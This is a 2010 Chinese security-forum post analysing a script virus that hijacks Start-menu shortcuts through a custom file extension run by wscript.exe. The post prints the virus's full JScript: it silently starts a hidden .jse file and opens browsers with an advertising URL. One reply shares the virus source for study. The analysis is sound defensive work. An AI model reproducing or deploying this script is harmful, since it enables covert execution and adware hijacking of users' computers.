首页
社区
课程
招聘
[原创]一个弱脚本病毒分析查杀
发表于: 2010-8-19 15:50 6816

[原创]一个弱脚本病毒分析查杀

2010-8-19 15:50
6816

朋友说中了个病毒很烦 然后就帮她查看了一下。
用xuetr看了看 没发现什么异常
最后发现开始菜单下某个文件下的快捷方式都有两个,如图。而且一点这个文件 就会在桌面生成淘宝的链接。(这些做淘宝客的人还挺恶心的)。
然后想 会不会是快捷方式指向病毒文件 运行病毒 然后再运行正确的文件。
然后把“快捷方式”拖到QQ里传到自己电脑上一看,是一个后缀很奇怪的文件(文件名卸载.psydckcvewon)。看这文件名 觉得是随机的 然后GOOGLE了一下 搜索不到 果然是随机的。
想到应该是自定义文件后缀 CMD下运行 assoc 和 ftype 一看 果然是自定义的文件后缀 指向

wscript.exe /B  "%1"
/*1JQOUESBWBGZK  = "unhnyksavqggjdgqugrqaprktpdddpkjik"  ; 
CJRWKKQEMVVJ  = "vhuujpkkdhllgdrkoqbgcwkxgbtxlutrhk"  ; 
JLRKFHVOSMRY  = "sokiahwedpwqjusrgkpcxofqkixgmbpltm"  ; 
WFSKZTFPUCFP  = "swlmymuvkdsosuqinlxhdfvpnmwydvhyii"  ; 
NEOCKQHYCWLE  = "aynhhixwvpuyppyfeedqkbpvnuidgndmpi"  ; 
*/var __x_abcd = new ActiveXObject("WScript.Shell");
__x_abcd.Run("wscript.exe /B \"C:\\Program Files\\Internt Explorer\\Windows Live\\EditPlus\\logoff.jse\" -run" ,  0 , false ) ;
var __x_abhb="C:\\Program Files\\Kingsoft\\WPS Office Personal\\utility\\uninst.exe";
var __x_abgum="";
if (__x_abhb == ""){
WScript.Quit() ;
}
var __x_abce = new Array() ;
__x_abce.push( "MAXTHON.EXE") ;__x_abce.push( "THEWORLD.EXE") ;__x_abce.push( "IEXPLORE.EXE") ;__x_abce.push( "360SE.EXE") ;__x_abce.push( "SOGOUEXPLORER.EXE") ;__x_abce.push( "TTRAVELER.EXE") ;__x_abce.push( "FIREFOX.EXE") ;
var __x_abeo = function(__x_abfk){
var __x_abfkUpper = __x_abfk.toUpperCase();
for (var __x_abfj in __x_abce){
if (__x_abfkUpper.indexOf(__x_abce[__x_abfj]) > 0){
return true
}
}
return false
};
var __x_abcj =new Array() ;
__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn");
var __x_abck=__x_abcj[parseInt(Math.random() * __x_abcj.length)] ;
if (__x_abeo(__x_abhb)){
__x_abgum = "\"" + __x_abck + "\"" ;
}
__x_abcd.Run("\"" + __x_abhb + "\" " + __x_abgum, 1, false) ;
WScript.Sleep(5000);
 

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 7
支持
分享
最新回复 (2)
雪    币: 81
活跃值: (55)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
2
我也遇到过这东西,一直搞不懂它是如何开机启动的
2010-8-20 12:39
0
雪    币: 1866
活跃值: (95)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
3
脚本病毒体的源代码
有需要的研究吧!
上传的附件:
2010-8-28 01:07
0
游客
登录 | 注册 方可回帖
返回
//